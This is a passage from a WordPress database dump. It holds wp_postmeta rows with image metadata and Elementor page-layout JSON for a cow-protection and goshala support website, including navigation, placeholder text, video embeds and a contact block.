;s:8:\"filesize\";i:88931;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"pexels-ave-calvar-martinez-3637852-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:320439;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"pexels-ave-calvar-martinez-3637852-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:559522;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:46:\"pexels-ave-calvar-martinez-3637852-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28661;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:44:\"pexels-ave-calvar-martinez-3637852-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4234;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:46:\"pexels-ave-calvar-martinez-3637852-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6704;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:44:\"pexels-ave-calvar-martinez-3637852-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4048;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:44:\"pexels-ave-calvar-martinez-3637852-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4048;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:38:\"pexels-ave-calvar-martinez-3637852.jpg\";}'),(10100,1693,'_wp_attached_file','2022/10/Frame.png'),(10101,1693,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:5052;s:6:\"height\";i:1664;s:4:\"file\";s:17:\"2022/10/Frame.png\";s:8:\"filesize\";i:387244;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"Frame-300x99.png\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12188;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"Frame-1024x337.png\";s:5:\"width\";i:1024;s:6:\"height\";i:337;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61364;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"Frame-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6312;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"Frame-768x253.png\";s:5:\"width\";i:768;s:6:\"height\";i:253;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42616;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"Frame-1536x506.png\";s:5:\"width\";i:1536;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102802;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:18:\"Frame-2048x675.png\";s:5:\"width\";i:2048;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:149883;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"Frame-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16745;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"Frame-50x16.png\";s:5:\"width\";i:50;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:945;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"Frame-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3728;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:15:\"Frame-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:900;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:15:\"Frame-48x16.png\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:900;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10104,1694,'_elementor_edit_mode','builder'),(10105,1694,'_elementor_template_type','wp-page'),(10106,1694,'_elementor_version','3.7.8'),(10107,1694,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (10108,1694,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10109,1694,'_elementor_page_assets','a:0:{}'),(10111,1695,'_elementor_edit_mode','builder'),(10112,1695,'_elementor_template_type','wp-page'),(10113,1695,'_elementor_version','3.7.8'),(10114,1695,'_wp_page_template','elementor_canvas'),(10115,1695,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\